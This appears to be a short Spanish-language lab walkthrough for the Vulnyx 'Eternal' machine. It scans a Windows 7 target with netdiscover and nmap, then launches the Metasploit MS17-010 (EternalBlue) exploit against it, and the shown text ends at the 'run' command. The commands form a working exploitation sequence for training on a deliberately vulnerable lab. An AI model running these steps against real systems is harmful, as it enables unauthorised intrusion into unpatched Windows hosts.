Máquina Eternal (Vulnyx)


Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:

$ netdiscover -i eth1 -r 10.0.2.0/24

  • Kali (Máquina Atacante): 10.0.2.4
  • Máquina Victima: 10.0.2.18
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutaremos el siguiente comando:

$ ping -c 1 10.0.2.18


Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.

A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:

$ nmap -Pn 10.0.2.18 -sVC


Como podemos comprobar la Máquina Victima tiene abiertos los puertos 135, 139, 445, 5357, 4915249153, 49154, 49155, 49156, 49157; y nos confirma que se trata de una Máquina con Windows 7.

A continuación, comprobamos si el servicio que corre por el puerto 445 (smb) es vulnerable su versión, para ello usaremos el script vuln de nmap, para ello ejecutaremos el siguiente comando:

$ nmap -p 445 10.0.2.18 --script vuln


Y comprobamos que es vulnerable.

A continuación, haremos uso de la herramienta Metasploit, para ello ejecutamos el siguiente comando para arrancarla:

$ msfconsole

Buscamos este exploit, para ello ejecutamos el siguiente comando dentro de la consola de Metasploit:

msf6> search ms17-010


Seleccionamos, configuramos y lanzamos el exploit, para ello ejecutamos los siguiente comandos dentro de la consola de Metasploit:

msf6> use 0
msf6> set RHOSTS 10.0.2.18
msf6> run